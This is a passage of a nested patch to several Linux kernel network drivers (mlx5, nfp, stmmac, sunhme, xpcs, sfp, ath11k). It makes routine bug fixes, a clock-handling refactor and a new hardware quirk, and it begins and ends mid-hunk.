+ 		complete(&fw_reset->done);
+ 	} else {
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 		if (mlx5_health_wait_pci_up(dev))
+ 			mlx5_core_err(dev, "reset reload flow aborted, PCI reads still not working\n");
+ 		else
+-			mlx5_load_one(dev, false);
++			mlx5_load_one(dev, true);
+ 		devlink_remote_reload_actions_performed(priv_to_devlink(dev), 0,
+ 							BIT(DEVLINK_RELOAD_ACTION_DRIVER_REINIT) |
+ 							BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
+@@ -484,8 +484,8 @@ int mlx5_fw_reset_wait_reset_done(struct mlx5_core_dev *dev)
+ 	}
+ 	err = fw_reset->ret;
+ 	if (test_and_clear_bit(MLX5_FW_RESET_FLAGS_RELOAD_REQUIRED, &fw_reset->reset_flags)) {
+-		mlx5_unload_one_devl_locked(dev);
+-		mlx5_load_one_devl_locked(dev, false);
++		mlx5_unload_one_devl_locked(dev, false);
++		mlx5_load_one_devl_locked(dev, true);
+ 	}
+ out:
+ 	clear_bit(MLX5_FW_RESET_FLAGS_PENDING_COMP, &fw_reset->reset_flags);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/health.c b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+index 879555ba847dd..e42e4ac231c64 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/health.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/health.c
+@@ -699,7 +699,7 @@ static void mlx5_fw_fatal_reporter_err_work(struct work_struct *work)
+ 		 * requests from the kernel.
+ 		 */
+ 		mlx5_core_err(dev, "Driver is in error state. Unloading\n");
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	}
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index f4e0431da55b4..0bb010d00a659 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1502,12 +1502,12 @@ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery)
+ 	return ret;
+ }
+ 
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev)
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	devl_assert_locked(priv_to_devlink(dev));
+ 	mutex_lock(&dev->intf_state_mutex);
+ 
+-	mlx5_detach_device(dev);
++	mlx5_detach_device(dev, suspend);
+ 
+ 	if (!test_bit(MLX5_INTERFACE_STATE_UP, &dev->intf_state)) {
+ 		mlx5_core_warn(dev, "%s: interface is down, NOP\n",
+@@ -1522,12 +1522,12 @@ out:
+ 	mutex_unlock(&dev->intf_state_mutex);
+ }
+ 
+-void mlx5_unload_one(struct mlx5_core_dev *dev)
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend)
+ {
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
+ 	devl_lock(devlink);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, suspend);
+ 	devl_unlock(devlink);
+ }
+ 
+@@ -1809,7 +1809,7 @@ static pci_ers_result_t mlx5_pci_err_detected(struct pci_dev *pdev,
+ 
+ 	mlx5_enter_error_state(dev, false);
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 	mlx5_drain_health_wq(dev);
+ 	mlx5_pci_disable_device(dev);
+ 
+@@ -1966,7 +1966,7 @@ static void shutdown(struct pci_dev *pdev)
+ 	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	err = mlx5_try_fast_unload(dev);
+ 	if (err)
+-		mlx5_unload_one(dev);
++		mlx5_unload_one(dev, false);
+ 	mlx5_pci_disable_device(dev);
+ }
+ 
+@@ -1974,7 +1974,7 @@ static int mlx5_suspend(struct pci_dev *pdev, pm_message_t state)
+ {
+ 	struct mlx5_core_dev *dev = pci_get_drvdata(pdev);
+ 
+-	mlx5_unload_one(dev);
++	mlx5_unload_one(dev, true);
+ 
+ 	return 0;
+ }
+@@ -2017,7 +2017,7 @@ MODULE_DEVICE_TABLE(pci, mlx5_core_pci_table);
+ void mlx5_disable_device(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one_devl_locked(dev);
++	mlx5_unload_one_devl_locked(dev, false);
+ }
+ 
+ int mlx5_recover_device(struct mlx5_core_dev *dev)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+index 029305a8b80a8..a3c5c2dab5fd7 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+@@ -236,7 +236,7 @@ void mlx5_adev_cleanup(struct mlx5_core_dev *dev);
+ int mlx5_adev_init(struct mlx5_core_dev *dev);
+ 
+ int mlx5_attach_device(struct mlx5_core_dev *dev);
+-void mlx5_detach_device(struct mlx5_core_dev *dev);
++void mlx5_detach_device(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_register_device(struct mlx5_core_dev *dev);
+ void mlx5_unregister_device(struct mlx5_core_dev *dev);
+ struct mlx5_core_dev *mlx5_get_next_phys_dev_lag(struct mlx5_core_dev *dev);
+@@ -319,8 +319,8 @@ int mlx5_mdev_init(struct mlx5_core_dev *dev, int profile_idx);
+ void mlx5_mdev_uninit(struct mlx5_core_dev *dev);
+ int mlx5_init_one(struct mlx5_core_dev *dev);
+ void mlx5_uninit_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one(struct mlx5_core_dev *dev);
+-void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev);
++void mlx5_unload_one(struct mlx5_core_dev *dev, bool suspend);
++void mlx5_unload_one_devl_locked(struct mlx5_core_dev *dev, bool suspend);
+ int mlx5_load_one(struct mlx5_core_dev *dev, bool recovery);
+ int mlx5_load_one_devl_locked(struct mlx5_core_dev *dev, bool recovery);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+index 7b4783ce213e2..a7377619ba6f2 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c
+@@ -74,7 +74,7 @@ static void mlx5_sf_dev_shutdown(struct auxiliary_device *adev)
+ {
+ 	struct mlx5_sf_dev *sf_dev = container_of(adev, struct mlx5_sf_dev, adev);
+ 
+-	mlx5_unload_one(sf_dev->mdev);
++	mlx5_unload_one(sf_dev->mdev, false);
+ }
+ 
+ static const struct auxiliary_device_id mlx5_sf_dev_id_table[] = {
+diff --git a/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c b/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c
+index 063cd371033a8..b7cf18fcb9461 100644
+--- a/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c
++++ b/drivers/net/ethernet/netronome/nfp/crypto/ipsec.c
+@@ -267,7 +267,7 @@ static void set_sha2_512hmac(struct nfp_ipsec_cfg_add_sa *cfg, int *trunc_len)
+ 
+ static int nfp_net_xfrm_add_state(struct xfrm_state *x)
+ {
+-	struct net_device *netdev = x->xso.dev;
++	struct net_device *netdev = x->xso.real_dev;
+ 	struct nfp_ipsec_cfg_mssg msg = {};
+ 	int i, key_len, trunc_len, err = 0;
+ 	struct nfp_ipsec_cfg_add_sa *cfg;
+@@ -503,7 +503,7 @@ static void nfp_net_xfrm_del_state(struct xfrm_state *x)
+ 		.cmd = NFP_IPSEC_CFG_MSSG_INV_SA,
+ 		.sa_idx = x->xso.offload_handle - 1,
+ 	};
+-	struct net_device *netdev = x->xso.dev;
++	struct net_device *netdev = x->xso.real_dev;
+ 	struct nfp_net *nn;
+ 	int err;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+index 6656d76b6766b..cf682a9e3fff2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-rk.c
+@@ -39,6 +39,24 @@ struct rk_gmac_ops {
+ 	u32 regs[];
+ };
+ 
++static const char * const rk_clocks[] = {
++	"aclk_mac", "pclk_mac", "mac_clk_tx", "clk_mac_speed",
++};
++
++static const char * const rk_rmii_clocks[] = {
++	"mac_clk_rx", "clk_mac_ref", "clk_mac_refout",
++};
++
++enum rk_clocks_index {
++	RK_ACLK_MAC = 0,
++	RK_PCLK_MAC,
++	RK_MAC_CLK_TX,
++	RK_CLK_MAC_SPEED,
++	RK_MAC_CLK_RX,
++	RK_CLK_MAC_REF,
++	RK_CLK_MAC_REFOUT,
++};
++
+ struct rk_priv_data {
+ 	struct platform_device *pdev;
+ 	phy_interface_t phy_iface;
+@@ -51,15 +69,9 @@ struct rk_priv_data {
+ 	bool clock_input;
+ 	bool integrated_phy;
+ 
++	struct clk_bulk_data *clks;
++	int num_clks;
+ 	struct clk *clk_mac;
+-	struct clk *gmac_clkin;
+-	struct clk *mac_clk_rx;
+-	struct clk *mac_clk_tx;
+-	struct clk *clk_mac_ref;
+-	struct clk *clk_mac_refout;
+-	struct clk *clk_mac_speed;
+-	struct clk *aclk_mac;
+-	struct clk *pclk_mac;
+ 	struct clk *clk_phy;
+ 
+ 	struct reset_control *phy_reset;
+@@ -104,10 +116,11 @@ static void px30_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	int ret;
+ 
+-	if (IS_ERR(bsp_priv->clk_mac_speed)) {
++	if (!clk_mac_speed) {
+ 		dev_err(dev, "%s: Missing clk_mac_speed clock\n", __func__);
+ 		return;
+ 	}
+@@ -116,7 +129,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_10M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 2500000);
++		ret = clk_set_rate(clk_mac_speed, 2500000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 2500000 failed: %d\n",
+ 				__func__, ret);
+@@ -124,7 +137,7 @@ static void px30_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		regmap_write(bsp_priv->grf, PX30_GRF_GMAC_CON1,
+ 			     PX30_GMAC_SPEED_100M);
+ 
+-		ret = clk_set_rate(bsp_priv->clk_mac_speed, 25000000);
++		ret = clk_set_rate(clk_mac_speed, 25000000);
+ 		if (ret)
+ 			dev_err(dev, "%s: set clk_mac_speed rate 25000000 failed: %d\n",
+ 				__func__, ret);
+@@ -1066,6 +1079,7 @@ static void rk3568_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1085,7 +1099,7 @@ static void rk3568_set_gmac_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1371,6 +1385,7 @@ static void rv1126_set_to_rmii(struct rk_priv_data *bsp_priv)
+ 
+ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1390,7 +1405,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1398,6 +1413,7 @@ static void rv1126_set_rgmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 
+ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ {
++	struct clk *clk_mac_speed = bsp_priv->clks[RK_CLK_MAC_SPEED].clk;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 	unsigned long rate;
+ 	int ret;
+@@ -1414,7 +1430,7 @@ static void rv1126_set_rmii_speed(struct rk_priv_data *bsp_priv, int speed)
+ 		return;
+ 	}
+ 
+-	ret = clk_set_rate(bsp_priv->clk_mac_speed, rate);
++	ret = clk_set_rate(clk_mac_speed, rate);
+ 	if (ret)
+ 		dev_err(dev, "%s: set clk_mac_speed rate %ld failed %d\n",
+ 			__func__, rate, ret);
+@@ -1475,68 +1491,50 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ {
+ 	struct rk_priv_data *bsp_priv = plat->bsp_priv;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+-	int ret;
++	int phy_iface = bsp_priv->phy_iface;
++	int i, j, ret;
+ 
+ 	bsp_priv->clk_enabled = false;
+ 
+-	bsp_priv->mac_clk_rx = devm_clk_get(dev, "mac_clk_rx");
+-	if (IS_ERR(bsp_priv->mac_clk_rx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_rx");
++	bsp_priv->num_clks = ARRAY_SIZE(rk_clocks);
++	if (phy_iface == PHY_INTERFACE_MODE_RMII)
++		bsp_priv->num_clks += ARRAY_SIZE(rk_rmii_clocks);
+ 
+-	bsp_priv->mac_clk_tx = devm_clk_get(dev, "mac_clk_tx");
+-	if (IS_ERR(bsp_priv->mac_clk_tx))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"mac_clk_tx");
++	bsp_priv->clks = devm_kcalloc(dev, bsp_priv->num_clks,
++				      sizeof(*bsp_priv->clks), GFP_KERNEL);
++	if (!bsp_priv->clks)
++		return -ENOMEM;
+ 
+-	bsp_priv->aclk_mac = devm_clk_get(dev, "aclk_mac");
+-	if (IS_ERR(bsp_priv->aclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"aclk_mac");
++	for (i = 0; i < ARRAY_SIZE(rk_clocks); i++)
++		bsp_priv->clks[i].id = rk_clocks[i];
+ 
+-	bsp_priv->pclk_mac = devm_clk_get(dev, "pclk_mac");
+-	if (IS_ERR(bsp_priv->pclk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"pclk_mac");
+-
+-	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
+-	if (IS_ERR(bsp_priv->clk_mac))
+-		dev_err(dev, "cannot get clock %s\n",
+-			"stmmaceth");
+-
+-	if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII) {
+-		bsp_priv->clk_mac_ref = devm_clk_get(dev, "clk_mac_ref");
+-		if (IS_ERR(bsp_priv->clk_mac_ref))
+-			dev_err(dev, "cannot get clock %s\n",
+-				"clk_mac_ref");
+-
+-		if (!bsp_priv->clock_input) {
+-			bsp_priv->clk_mac_refout =
+-				devm_clk_get(dev, "clk_mac_refout");
+-			if (IS_ERR(bsp_priv->clk_mac_refout))
+-				dev_err(dev, "cannot get clock %s\n",
+-					"clk_mac_refout");
+-		}
++	if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		for (j = 0; j < ARRAY_SIZE(rk_rmii_clocks); j++)
++			bsp_priv->clks[i++].id = rk_rmii_clocks[j];
+ 	}
+ 
+-	bsp_priv->clk_mac_speed = devm_clk_get(dev, "clk_mac_speed");
+-	if (IS_ERR(bsp_priv->clk_mac_speed))
+-		dev_err(dev, "cannot get clock %s\n", "clk_mac_speed");
++	ret = devm_clk_bulk_get_optional(dev, bsp_priv->num_clks,
++					 bsp_priv->clks);
++	if (ret)
++		return dev_err_probe(dev, ret, "Failed to get clocks\n");
++
++	/* "stmmaceth" will be enabled by the core */
++	bsp_priv->clk_mac = devm_clk_get(dev, "stmmaceth");
++	ret = PTR_ERR_OR_ZERO(bsp_priv->clk_mac);
++	if (ret)
++		return dev_err_probe(dev, ret, "Cannot get stmmaceth clock\n");
+ 
+ 	if (bsp_priv->clock_input) {
+ 		dev_info(dev, "clock input from PHY\n");
+-	} else {
+-		if (bsp_priv->phy_iface == PHY_INTERFACE_MODE_RMII)
+-			clk_set_rate(bsp_priv->clk_mac, 50000000);
++	} else if (phy_iface == PHY_INTERFACE_MODE_RMII) {
++		clk_set_rate(bsp_priv->clk_mac, 50000000);
+ 	}
+ 
+ 	if (plat->phy_node && bsp_priv->integrated_phy) {
+ 		bsp_priv->clk_phy = of_clk_get(plat->phy_node, 0);
+-		if (IS_ERR(bsp_priv->clk_phy)) {
+-			ret = PTR_ERR(bsp_priv->clk_phy);
+-			dev_err(dev, "Cannot get PHY clock: %d\n", ret);
+-			return -EINVAL;
+-		}
++		ret = PTR_ERR_OR_ZERO(bsp_priv->clk_phy);
++		if (ret)
++			return dev_err_probe(dev, ret, "Cannot get PHY clock\n");
+ 		clk_set_rate(bsp_priv->clk_phy, 50000000);
+ 	}
+ 
+@@ -1545,77 +1543,36 @@ static int rk_gmac_clk_init(struct plat_stmmacenet_data *plat)
+ 
+ static int gmac_clk_enable(struct rk_priv_data *bsp_priv, bool enable)
+ {
+-	int phy_iface = bsp_priv->phy_iface;
++	int ret;
+ 
+ 	if (enable) {
+ 		if (!bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				if (!IS_ERR(bsp_priv->mac_clk_rx))
+-					clk_prepare_enable(
+-						bsp_priv->mac_clk_rx);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_ref))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_ref);
+-
+-				if (!IS_ERR(bsp_priv->clk_mac_refout))
+-					clk_prepare_enable(
+-						bsp_priv->clk_mac_refout);
+-			}
+-
+-			if (!IS_ERR(bsp_priv->clk_phy))
+-				clk_prepare_enable(bsp_priv->clk_phy);
++			ret = clk_bulk_prepare_enable(bsp_priv->num_clks,
++						      bsp_priv->clks);
++			if (ret)
++				return ret;
+ 
+-			if (!IS_ERR(bsp_priv->aclk_mac))
+-				clk_prepare_enable(bsp_priv->aclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->pclk_mac))
+-				clk_prepare_enable(bsp_priv->pclk_mac);
+-
+-			if (!IS_ERR(bsp_priv->mac_clk_tx))
+-				clk_prepare_enable(bsp_priv->mac_clk_tx);
+-
+-			if (!IS_ERR(bsp_priv->clk_mac_speed))
+-				clk_prepare_enable(bsp_priv->clk_mac_speed);
++			ret = clk_prepare_enable(bsp_priv->clk_phy);
++			if (ret)
++				return ret;
+ 
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					       bsp_priv->clock_input, true);
+ 
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_prepare_enable(bsp_priv->clk_mac);
+-			 */
+ 			mdelay(5);
+ 			bsp_priv->clk_enabled = true;
+ 		}
+ 	} else {
+ 		if (bsp_priv->clk_enabled) {
+-			if (phy_iface == PHY_INTERFACE_MODE_RMII) {
+-				clk_disable_unprepare(bsp_priv->mac_clk_rx);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_ref);
+-
+-				clk_disable_unprepare(bsp_priv->clk_mac_refout);
+-			}
+-
++			clk_bulk_disable_unprepare(bsp_priv->num_clks,
++						   bsp_priv->clks);
+ 			clk_disable_unprepare(bsp_priv->clk_phy);
+ 
+-			clk_disable_unprepare(bsp_priv->aclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->pclk_mac);
+-
+-			clk_disable_unprepare(bsp_priv->mac_clk_tx);
+-
+-			clk_disable_unprepare(bsp_priv->clk_mac_speed);
+-
+ 			if (bsp_priv->ops && bsp_priv->ops->set_clock_selection)
+ 				bsp_priv->ops->set_clock_selection(bsp_priv,
+ 					      bsp_priv->clock_input, false);
+-			/**
+-			 * if (!IS_ERR(bsp_priv->clk_mac))
+-			 *	clk_disable_unprepare(bsp_priv->clk_mac);
+-			 */
++
+ 			bsp_priv->clk_enabled = false;
+ 		}
+ 	}
+@@ -1629,9 +1586,6 @@ static int phy_power_on(struct rk_priv_data *bsp_priv, bool enable)
+ 	int ret;
+ 	struct device *dev = &bsp_priv->pdev->dev;
+ 
+-	if (!ldo)
+-		return 0;
+-
+ 	if (enable) {
+ 		ret = regulator_enable(ldo);
+ 		if (ret)
+@@ -1679,14 +1633,11 @@ static struct rk_priv_data *rk_gmac_setup(struct platform_device *pdev,
+ 		}
+ 	}
+ 
+-	bsp_priv->regulator = devm_regulator_get_optional(dev, "phy");
++	bsp_priv->regulator = devm_regulator_get(dev, "phy");
+ 	if (IS_ERR(bsp_priv->regulator)) {
+-		if (PTR_ERR(bsp_priv->regulator) == -EPROBE_DEFER) {
+-			dev_err(dev, "phy regulator is not available yet, deferred probing\n");
+-			return ERR_PTR(-EPROBE_DEFER);
+-		}
+-		dev_err(dev, "no regulator found\n");
+-		bsp_priv->regulator = NULL;
++		ret = PTR_ERR(bsp_priv->regulator);
++		dev_err_probe(dev, ret, "failed to get phy regulator\n");
++		return ERR_PTR(ret);
+ 	}
+ 
+ 	ret = of_property_read_string(dev->of_node, "clock_in_out", &strings);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 014ce97f96b15..d0e64c1ab9a55 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -6348,6 +6348,10 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	bool is_double = false;
+ 	int ret;
+ 
++	ret = pm_runtime_resume_and_get(priv->device);
++	if (ret < 0)
++		return ret;
++
+ 	if (be16_to_cpu(proto) == ETH_P_8021AD)
+ 		is_double = true;
+ 
+@@ -6355,16 +6359,18 @@ static int stmmac_vlan_rx_add_vid(struct net_device *ndev, __be16 proto, u16 vid
+ 	ret = stmmac_vlan_update(priv, is_double);
+ 	if (ret) {
+ 		clear_bit(vid, priv->active_vlans);
+-		return ret;
++		goto err_pm_put;
+ 	}
+ 
+ 	if (priv->hw->num_vlan) {
+ 		ret = stmmac_add_hw_vlan_rx_fltr(priv, ndev, priv->hw, proto, vid);
+ 		if (ret)
+-			return ret;
++			goto err_pm_put;
+ 	}
++err_pm_put:
++	pm_runtime_put(priv->device);
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int stmmac_vlan_rx_kill_vid(struct net_device *ndev, __be16 proto, u16 vid)
+diff --git a/drivers/net/ethernet/sun/sunhme.c b/drivers/net/ethernet/sun/sunhme.c
+index b0c7ab74a82ed..7cf8210ebbec3 100644
+--- a/drivers/net/ethernet/sun/sunhme.c
++++ b/drivers/net/ethernet/sun/sunhme.c
+@@ -2834,7 +2834,7 @@ static int happy_meal_pci_probe(struct pci_dev *pdev,
+ 	int i, qfe_slot = -1;
+ 	char prom_name[64];
+ 	u8 addr[ETH_ALEN];
+-	int err;
++	int err = -ENODEV;
+ 
+ 	/* Now make sure pci_dev cookie is there. */
+ #ifdef CONFIG_SPARC
+diff --git a/drivers/net/pcs/pcs-xpcs.c b/drivers/net/pcs/pcs-xpcs.c
+index f6a038a1d51e4..c70b27c4c1d5e 100644
+--- a/drivers/net/pcs/pcs-xpcs.c
++++ b/drivers/net/pcs/pcs-xpcs.c
+@@ -323,7 +323,7 @@ static int xpcs_read_fault_c73(struct dw_xpcs *xpcs,
+ 	return 0;
+ }
+ 
+-static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
++static int xpcs_read_link_c73(struct dw_xpcs *xpcs)
+ {
+ 	bool link = true;
+ 	int ret;
+@@ -335,15 +335,6 @@ static int xpcs_read_link_c73(struct dw_xpcs *xpcs, bool an)
+ 	if (!(ret & MDIO_STAT1_LSTATUS))
+ 		link = false;
+ 
+-	if (an) {
+-		ret = xpcs_read(xpcs, MDIO_MMD_AN, MDIO_STAT1);
+-		if (ret < 0)
+-			return ret;
+-
+-		if (!(ret & MDIO_STAT1_LSTATUS))
+-			link = false;
+-	}
+-
+ 	return link;
+ }
+ 
+@@ -937,7 +928,7 @@ static int xpcs_get_state_c73(struct dw_xpcs *xpcs,
+ 	int ret;
+ 
+ 	/* Link needs to be read first ... */
+-	state->link = xpcs_read_link_c73(xpcs, state->an_enabled) > 0 ? 1 : 0;
++	state->link = xpcs_read_link_c73(xpcs) > 0 ? 1 : 0;
+ 
+ 	/* ... and then we check the faults. */
+ 	ret = xpcs_read_fault_c73(xpcs, state);
+diff --git a/drivers/net/phy/sfp.c b/drivers/net/phy/sfp.c
+index b224800d7db0b..10e66c89ca0fe 100644
+--- a/drivers/net/phy/sfp.c
++++ b/drivers/net/phy/sfp.c
+@@ -395,6 +395,10 @@ static const struct sfp_quirk sfp_quirks[] = {
+ 
+ 	SFP_QUIRK_F("HALNy", "HL-GSFP", sfp_fixup_halny_gsfp),
+ 
++	// HG MXPD-483II-F 2.5G supports 2500Base-X, but incorrectly reports
++	// 2600MBd in their EERPOM
++	SFP_QUIRK_M("HG GENUINE", "MXPD-483II", sfp_quirk_2500basex),
++
+ 	// Huawei MA5671A can operate at 2500base-X, but report 1.2GBd NRZ in
+ 	// their EEPROM
+ 	SFP_QUIRK("HUAWEI", "MA5671A", sfp_quirk_2500basex,
+diff --git a/drivers/net/wireless/ath/ath11k/ahb.c b/drivers/net/wireless/ath/ath11k/ahb.c
+index d34a4d6325b2b..76f275ca53e9c 100644
+--- a/drivers/net/wireless/ath/ath11k/ahb.c
++++ b/drivers/net/wireless/ath/ath11k/ahb.c
+@@ -859,11 +859,11 @@ static int ath11k_ahb_setup_msi_resources(struct ath11k_base *ab)
+ 	ab->pci.msi.ep_base_data = int_prop + 32;
+ 
+ 	for (i = 0; i < ab->pci.msi.config->total_vectors; i++) {
+-		res = platform_get_resource(pdev, IORESOURCE_IRQ, i);
+-		if (!res)
+-			return -ENODEV;
++		ret = platform_get_irq(pdev, i);
++		if (ret < 0)
++			return ret;
+ 
+-		ab->pci.msi.irqs[i] = res->start;
++		ab->pci.msi.irqs[i] = ret;
+ 	}
+ 
+ 	set_bit(ATH11K_FLAG_MULTI_MSI_VECTORS, &ab->dev_flags);
+@@ -1063,6 +1063,12 @@ static int ath11k_ahb_fw_resource_deinit(struct ath11k_base *ab)
+ 	struct iommu_domain *iommu;
+ 	size_t unmapped_size;
+ 
++	/* Chipsets not requiring MSA would have not initialized
++	 * MSA resources, return success in such cases.
++	 */
++	if (!ab->hw_params.fixed_fw_mem)
++		return 0;
++
+ 	if (ab_ahb->fw.use_tz)
+ 		return 0;
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/dbring.c b/drivers/net/wireless/ath/ath11k/dbring.c
+index 2107ec05d14fd..5536e86423312 100644
+--- a/drivers/net/wireless/ath/ath11k/dbring.c
++++ b/drivers/net/wireless/ath/ath11k/dbring.c
+@@ -26,13 +26,13 @@ int ath11k_dbring_validate_buffer(struct ath11k *ar, void *buffer, u32 size)
+ static void ath11k_dbring_fill_magic_value(struct ath11k *ar,
+ 					   void *buffer, u32 size)
+ {
+-	u32 *temp;
+-	int idx;
+-
+-	size = size >> 2;
++	/* memset32 function fills buffer payload with the ATH11K_DB_MAGIC_VALUE
++	 * and the variable size is expected to be the number of u32 values
++	 * to be stored, not the number of bytes.
++	 */
++	size = size / sizeof(u32);
+ 
+-	for (idx = 0, temp = buffer; idx < size; idx++, temp++)
+-		*temp++ = ATH11K_DB_MAGIC_VALUE;
++	memset32(buffer, ATH11K_DB_MAGIC_VALUE, size);
+ }
+ 
+ static int ath11k_dbring_bufs_replenish(struct ath11k *ar,
+diff --git a/drivers/net/wireless/ath/ath11k/mhi.c b/drivers/net/wireless/ath/ath11k/mhi.c
+index 86995e8dc9135..a62ee05c54097 100644
+--- a/drivers/net/wireless/ath/ath11k/mhi.c
++++ b/drivers/net/wireless/ath/ath11k/mhi.c
+@@ -16,7 +16,7 @@
+ #include "pci.h"
+ #include "pcic.h"
+ 
+-#define MHI_TIMEOUT_DEFAULT_MS	90000
++#define MHI_TIMEOUT_DEFAULT_MS	20000
+ #define RDDM_DUMP_SIZE	0x420000
+ 
+ static struct mhi_channel_config ath11k_mhi_channels_qca6390[] = {
+diff --git a/drivers/net/wireless/ath/ath11k/peer.c b/drivers/net/wireless/ath/ath11k/peer.c
+index 1ae7af02c364e..1380811827a84 100644
+--- a/drivers/net/wireless/ath/ath11k/peer.c
++++ b/drivers/net/wireless/ath/ath11k/peer.c
+@@ -382,22 +382,23 @@ int ath11k_peer_create(struct ath11k *ar, struct ath11k_vif *arvif,
+ 		return -ENOBUFS;
+ 	}
+ 
++	mutex_lock(&ar->ab->tbl_mtx_lock);
+ 	spin_lock_bh(&ar->ab->base_lock);
